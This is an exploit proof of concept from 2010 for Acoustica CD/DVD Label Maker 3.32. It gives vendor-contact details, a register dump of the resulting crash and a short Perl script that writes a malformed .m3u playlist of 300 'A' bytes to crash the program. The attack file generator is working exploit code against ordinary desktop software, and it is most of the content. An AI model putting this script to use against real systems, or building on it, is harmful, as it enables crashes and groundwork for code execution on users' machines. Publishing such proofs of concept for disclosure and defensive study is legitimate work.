# Exploit Title: Acoustica cd/dvd label maker .m3u PoC # Date: April 27,2010 # Software Link: [http://www.acoustica.com/cd-label-maker/] # Version: 3.32 # Tested on: Windows XP Sp3/Windows 7 # Author: chap0 # Email: chap0x90 at gmail dot com # # Contacted Vendor Apr 19, 2010 # Auto Reply Support Ticket ID:155626 Apr 19 2010 # No further communication from vendor # # Greetz and Thanks to mr_me # # # EAX 00000041 # ECX 0000012C # EDX 000DE9A8 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA. . ." # EBX 000004EA # ESP 000DE960 # EBP 000DEBB8 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" # ESI 00410041 cdlabel.00410041 # EDI 00410041 cdlabel.00410041 # EIP 00605216 cdlabel.00605216 # #!/usr/bin/perl $file = "boom.m3u"; $junk = "\x41" x 300; print "Creating Nasty .m3u file\n"; open (FILE, ">$file"); print FILE "$junk"; close FILE; print "Done\n";